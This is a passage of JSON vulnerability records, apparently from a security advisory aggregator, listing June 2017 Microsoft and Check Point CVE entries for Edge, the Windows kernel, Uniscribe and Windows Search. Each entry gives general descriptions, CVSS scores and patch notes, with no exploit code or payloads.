A remote unauthenticated attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Edge Scripting Engine Memory Corruption (MS17-007: CVE-2017-0071; CVE-2017-8548)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0071", "CVE-2017-8548"], "modified": "2017-08-29T00:00:00", "id": "CPAI-2017-0168", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when affected Microsoft scripting engines do not properly handle objects in memory. The vulnerability could allow an attacker to detect specific files on the user's computer. In a web-based attack scenario, an attacker could host a website that is used to attempt to exploit the vulnerability.\n\nIn addition, compromised websites and websites that accept or host user-generated content could contain specially crafted content that could exploit the vulnerability. 
However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action. For example, an attacker could trick a user into clicking a link that takes the user to the attacker's site.\n\nAn attacker who successfully exploited the vulnerability could potentially read data that was not intended to be disclosed. Note that the vulnerability would not allow an attacker to either execute code or to elevate a user\u2019s rights directly, but the vulnerability could be used to obtain information in an attempt to further compromise the affected system.\n\nThe security update addresses the vulnerability by helping to restrict what information is returned to affected Microsoft browsers.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Browser Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529"], "modified": "2017-09-20T07:00:00", "id": "MS:CVE-2017-8529", "href": 
"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8529", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege vulnerability exists when tdx.sys fails to check the length of a buffer prior to copying memory to it.\n\nTo exploit the vulnerability, in a local attack scenario, an attacker could run a specially crafted application to elevate the attacker's privilege level. An attacker who successfully exploited this vulnerability could run processes in an elevated context.\n\nHowever, an attacker must first gain access to the local system with the ability to execute a malicious application in order to exploit this vulnerability.\n\nThe security update addresses the vulnerability by changing how tdx.sys validates buffer length.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows TDX Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-0296"], "modified": "2017-06-27T07:00:00", "id": 
"MS:CVE-2017-0296", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0296", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit the vulnerability, the attacker could send specially crafted messages to the Windows Search service. An attacker with access to a target computer could exploit this vulnerability to elevate privileges and take control of the computer. Additionally, in an enterprise scenario, a remote unauthenticated attacker could remotely trigger the vulnerability through an SMB connection and then take control of a target computer.\n\nThe security update addresses the vulnerability by correcting how Windows Search handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Search Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8543", "CVE-2017-8529"], "modified": "2017-07-11T07:00:00", "id": "MS:CVE-2017-8543", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8543", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2017-8492", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8492", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8492", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nAn authenticated attacker could exploit this vulnerability by running a specially crafted application.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-28T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8554"], "modified": "2017-06-28T07:00:00", "id": "MS:CVE-2017-8554", "href": 
"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8554", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application.\n\nThe security update addresses the vulnerability by correcting how the Windows kernel initializes memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0299", "CVE-2017-8529"], "modified": "2017-08-08T07:00:00", "id": "MS:CVE-2017-0299", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0299", "cvss": {"score": 4.3, "vector": 
"AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists when Microsoft Edge improperly handles requests of different origins. The vulnerability allows Microsoft Edge to bypass Same-Origin Policy (SOP) restrictions, and to allow requests that should otherwise be ignored. An attacker who successfully exploited the vulnerability could force the browser to send data that would otherwise be restricted.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how affected Microsoft Edge handles different-origin requests.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8523", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8523", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8523", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThere are multiple ways an attacker could exploit this vulnerability:\n\n * In a web-based attack scenario, an attacker could host a specially crafted website designed to exploit this vulnerability and then convince a user to view the website. An attacker would have no way to force users to view the attacker-controlled content. 
Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an email or instant message that takes users to the attacker's website, or by opening an attachment sent through email.\n * In a file-sharing attack scenario, an attacker could provide a specially crafted document file designed to exploit this vulnerability and then convince a user to open the document file.\n\nThe security update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n\nNote that for the Office products listed in the Affected Products table, where the severity is indicated as Critical, the Preview Pane is an attack vector for this vulnerability.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Uniscribe Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0283", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0283", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0283", "cvss": {"score": 
9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0286", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0286", "href": 
"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files.\n\nTo exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver.\n\nThe update addresses the vulnerability by correcting how Windows handles cabinet files.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0294", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0294", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0294", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", 
"description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. 
Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8520", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8520", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8520", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8484"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8484", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8484", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8475", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8475", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8475", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8477", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8477", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8477", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 